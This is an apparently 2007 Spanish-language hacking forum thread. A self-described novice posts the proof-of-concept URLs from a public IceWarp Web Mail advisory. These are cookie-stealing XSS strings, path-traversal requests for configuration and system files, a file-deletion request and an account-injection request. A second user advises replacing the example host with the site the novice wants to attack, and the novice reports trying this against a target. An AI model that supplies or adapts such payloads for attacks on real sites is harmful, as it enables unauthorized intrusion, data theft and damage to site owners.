Nuevas NORMAS para el foro
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
¿Perdiste tu
email de activación?
- Julio 26, 2008, 03:43:21
Boton Buscar
Visita:
Articulos
-
Juegos Gratis
-
Da Foros
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderador:
OzX
) | Tema:
Duda con Un Exploit
0 Usuarios y 1 Visitante están viendo este tema.
« anterior
próximo »
Páginas:
[
1
]
Autor
Tema: Duda con Un Exploit (Leído 143 veces)
[the - triOlo]
Habitual
Desconectado
Mensajes: 267
Duda con Un Exploit
«
en:
Febrero 16, 2007, 01:25:08 »
Bueno amigos miren le pase el SSS a una Web y encontro 2 vulnerabilidades (en Audits) luego fui a Bugtraq ID y el numero que tenia era el 12396 fui a la Web para ver el explits y me salio esto...:
IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities
The following examples are available:
Código:
http:// www.example.com:32000/mail/accountsettings.html->Add->”Account name”,”Incoming mail server”,”User name” = <script>alert(document.cookie) </script>
http:// www.example.com:32000/mail/search.html->”Search string” = <script> alert(document.cookie) </script>
http://www.example.com:32000/mail/viewaction.html?Move_x=1&user=../../hacker
http://www.example.com:32000/mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32
http://www.example.com:32000/mail/viewaction.html?messageid=....//....//config/settings.cfg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail
http://www.example.com:32000/mail/attachment.html?user=merakdemo.com/admin&messageid=20040801&index=3&folder=inbox
http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any text with special characters]
http://www.example.com:32000/mail/folders.html?id=[sessionid]&folderold=....//....//....//….//….//winnt&folder=....//....//....//….//….//linux&Save_x=1
Quisiera saber si ese es el exploits que tengo que compilar....
Disculpen por la pregunta pero es q Soy un Novato en esto...
Espero que me respondan plzz jejje
Nos Vemos...
En línea
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Renders
||
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Brushes
||
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Deluxe Pack
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Mi Blog [ Zona - Brian ]
Pr0gr4mer
Colaborador
Desconectado
Mensajes: 865
Pr0gr4mer al mango
Re: Duda con Un Exploit
«
Respuesta #1 en:
Febrero 16, 2007, 02:39:22 »
No son exploits.... es decir, no es un codigo que podes compilar, lo que tenes que hacer es reemplazar el ejemplo por
la web que queres atacar entonces quizas te de privilegios o algun rfi para poder editar la web.
Pr0gr4mer
En línea
Tu respuesta esta dandole click al
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
San Buscador
.::Pr0gr4mer::.
[the - triOlo]
Habitual
Desconectado
Mensajes: 267
Re: Duda con Un Exploit
«
Respuesta #2 en:
Febrero 16, 2007, 10:08:13 »
Gracias por responder Pr0gr4mer....pero cambie el example por la Web que quiero atacar pero me dice esto...
HTTP/1.1 404 Object Not Found
no se si lo hice bien pero puse esto...:
Código:
http://www.webparaatacar.com/:32000/mail/viewaction.html?messageid=....//....//config/settings.cfg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail
Bueno eso....espero me respondan plzzz
Nos Vemos...
En línea
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Renders
||
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Brushes
||
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Deluxe Pack
Para ver los enlaces debes ser usuario
Crear Usuario
o
Hacer Sesion
Mi Blog [ Zona - Brian ]
Páginas:
[
1
]
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderador:
OzX
) | Tema:
Duda con Un Exploit
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Foros De Consulta General
-----------------------------
=> Novedades
=> Dudas, Comentarios Y Sugerencias
=> Top 100
=> Off-Topic
=> Revista E-Zine
===> Noticias
-----------------------------
Phreaking, Hacking y Seguridad
-----------------------------
=> HacK GeneraL
===> Ingenieria Inversa
===> Encriptacion, Cryptografia
===> TV HACK
===> Seguridad
===> Cursos y Ezines
=====> Trucos Internet
=====> Textos Hacking
===> Defacing
=> Phreaking
===> Moviles
=> Bug y Exploits
-----------------------------
Hack Novato
-----------------------------
=> Hack para newbies
=> Todo Messenger
=> Troyanos y virus
-----------------------------
Sistemas Operativos
-----------------------------
=> Windows y otros sistemas operativos no libres
===> Problemas Tecnicos Windows
=> Sistemas operativos libres.
===> GNU/Linux
===> Manuales y Tutoriales
===> Descargas
-----------------------------
Programacion
-----------------------------
=> Programación
===> Programación Basica
===> Otros Lenguajes
===> Visual Basic y Net
===> ASM
===> Programacion Shell
===> Perl
===> Carbide C/C#/C++
===> Batch
===> SQL
=> Programacion para webmasters
===> Consultas
===> Php
===> Html
===> Java - Java Script
===> Php Nuke
===> Scripts Pre-Fabricados
===> Mysql
===> CSS y Diseño Web
-----------------------------
Artes Graficas
-----------------------------
=> Diseño Grafico
===> Battle Arts
===> Flash
===> Tutoriales
===> Galerías
===> Software
-----------------------------
Area Tecnica
-----------------------------
=> Networking & Wireless
=> Overclocking, Refrigeracion y demas
=> Hardware
===> Cursos Y manuales
=> Electronica Y Robotica
-----------------------------
Programas
-----------------------------
=> Software
===> Configuraciones de software
===> Pedidos de software
=> Cracks & Serialz
=> P2p, Bittorrent, Elinks
-----------------------------
Multimedia Y Divx
-----------------------------
=> Juegos PC Y Consolas
===> Dudas ayudas y comentarios de juegos
===> Pedidos de juegos
=> Mp3
=> Multimedia
=> Peliculas Divx
-----------------------------
Entretenimiento Y sitios de interes
-----------------------------
=> Juegos, Humor y Adultos. (Diversión)
===> Adultos
=> Paginas Webs Recomendadas
=> Videos
Powered by SMF 1.1.5
|
SMF © 2006-2007, Simple Machines LLC
Loading...